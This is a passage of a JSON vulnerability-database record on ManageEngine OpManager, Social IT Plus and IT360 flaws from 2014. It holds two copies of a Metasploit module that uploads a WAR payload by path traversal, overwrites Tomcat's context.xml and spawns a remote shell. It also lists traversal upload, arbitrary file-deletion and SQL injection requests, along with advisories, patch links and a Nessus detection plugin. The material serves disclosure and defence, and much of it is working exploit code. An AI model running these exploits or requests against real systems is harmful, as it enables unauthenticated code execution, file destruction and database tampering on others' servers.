file\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context\r\nprivileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"conf\",\r\n'FILENAME' => \"context.xml\"\r\n}\r\n})\r\nelse\r\n# We need to create the upload directories before our first attempt to upload the WAR.\r\nprint_status(\"#{peer} - Creating upload directories\")\r\nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => \"\",\r\n'FILENAME' => bogus_file\r\n}\r\n})\r\nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\r\nend\r\n\r\nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\nprint_status(\"#{peer} - Uploading WAR file...\")\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => war_payload,\r\n'ctype' => 'application/octet-stream',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"webapps\",\r\n'FILENAME' => app_base + \".war\"\r\n}\r\n})\r\n\r\n# The server either returns a 500 error or a 200 OK when the upload is successful.\r\nif res and (res.code == 500 or res.code == 200)\r\nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\r\n\" seconds for deployment\")\r\nsleep(datastore['SLEEP'])\r\nelse\r\nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\")\r\nend\r\n\r\nprint_status(\"#{peer} - Executing payload, wait for session...\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n'method' => 'GET'\r\n})\r\nend\r\n\r\n\r\ndef exploit\r\napp_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\nupload_war_and_exec(false, app_base)\r\nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\r\n\r\nsleep_counter = 0\r\nwhile not session_created?\r\nif sleep_counter == datastore['SLEEP']\r\nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\")\r\nupload_war_and_exec(true, app_base)\r\nreturn\r\nend\r\n\r\nsleep(1)\r\nsleep_counter += 1\r\nend\r\nend\r\nend\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager version 11.4 might not have the fix as the release is almost ready. They are planning to include the fix in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22712"}, {"lastseen": "2018-03-14T14:37:35", "references": [], "description": "Exploit for multiple platform in category web applications", "edition": 1, "reporter": "Pedro Ribeiro", "published": "2018-01-26T00:00:00", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "href": "https://0day.today/exploit/description/29642", "id": "1337DAY-ID-29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29642"}], "zdi": [{"lastseen": "2016-11-09T00:18:12", "references": ["https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the FileCollector servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "reporter": "Andrea Micalizzi (rgod)", "published": "2015-04-15T00:00:00", "title": "ManageEngine OpManager FileCollector FILENAME File Upload Remote Code Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-6034"], "modified": "2015-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-143", "id": "ZDI-15-143", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "metasploit": [{"lastseen": "2018-08-12T23:21:21", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. The vulnerability exists in the FileCollector servlet which accepts unauthenticated file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on version 11.0 of SocialIT for Windows and Linux.", "reporter": "Rapid7", "published": "2014-09-27T18:33:49", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/http/opmanager_socialit_file_upload.rb", "type": "metasploit", "title": "ManageEngine OpManager and Social IT Arbitrary File Upload", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/MULTI/HTTP/OPMANAGER_SOCIALIT_FILE_UPLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine OpManager and Social IT Arbitrary File Upload',\n 'Description' => %q{\n This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\n The vulnerability exists in the FileCollector servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\n version 11.0 of SocialIT for Windows and Linux.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-6034' ],\n [ 'OSVDB', '112276' ],\n [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\n ],\n 'Privileged' => true,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 27 2014'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptInt.new('SLEEP',\n [true, 'Seconds to sleep while we wait for WAR deployment', 15]),\n ])\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\n 'method' => 'GET'\n })\n\n # A GET request on this servlet returns \"405 Method not allowed\"\n if res and res.code == 405\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def upload_war_and_exec(try_again, app_base)\n tomcat_path = '../../../tomcat/'\n servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\n\n if try_again\n # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\n # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\n # The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments.\n # After replacing the context.xml file let's upload the WAR again.\n print_status(\"Replacing Tomcat context file\")\n send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\n 'ctype' => 'application/xml',\n 'vars_get' => {\n 'regionID' => tomcat_path + \"conf\",\n 'FILENAME' => \"context.xml\"\n }\n })\n else\n # We need to create the upload directories before our first attempt to upload the WAR.\n print_status(\"Creating upload directories\")\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\n send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\n 'ctype' => 'application/xml',\n 'vars_get' => {\n 'regionID' => \"\",\n 'FILENAME' => bogus_file\n }\n })\n register_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\n end\n\n war_payload = payload.encoded_war({ :app_name => app_base }).to_s\n\n print_status(\"Uploading WAR file...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => war_payload,\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'regionID' => tomcat_path + \"webapps\",\n 'FILENAME' => app_base + \".war\"\n }\n })\n\n # The server either returns a 500 error or a 200 OK when the upload is successful.\n if res and (res.code == 500 or res.code == 200)\n print_good(\"Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\n \" seconds for deployment\")\n sleep(datastore['SLEEP'])\n else\n fail_with(Failure::Unknown, \"#{peer} - WAR upload failed\")\n end\n\n print_status(\"Executing payload, wait for session...\")\n send_request_cgi({\n 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\n 'method' => 'GET'\n })\n end\n\n\n def exploit\n app_base = rand_text_alphanumeric(4 + rand(32 - 4))\n\n upload_war_and_exec(false, app_base)\n register_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\n\n sleep_counter = 0\n while not session_created?\n if sleep_counter == datastore['SLEEP']\n print_error(\"Failed to get a shell, let's try one more time\")\n upload_war_and_exec(true, app_base)\n return\n end\n\n sleep(1)\n sleep_counter += 1\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/opmanager_socialit_file_upload.rb"}], "nessus": [{"lastseen": "2018-06-15T13:41:46", "references": ["http://www.nessus.org/u?6b48dd0a", "http://seclists.org/fulldisclosure/2014/Sep/110"], "pluginID": "81378", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "edition": 5, "reporter": "Tenable", "published": "2015-02-16T00:00:00", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2018-06-14T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81378", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b48dd0a\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}}
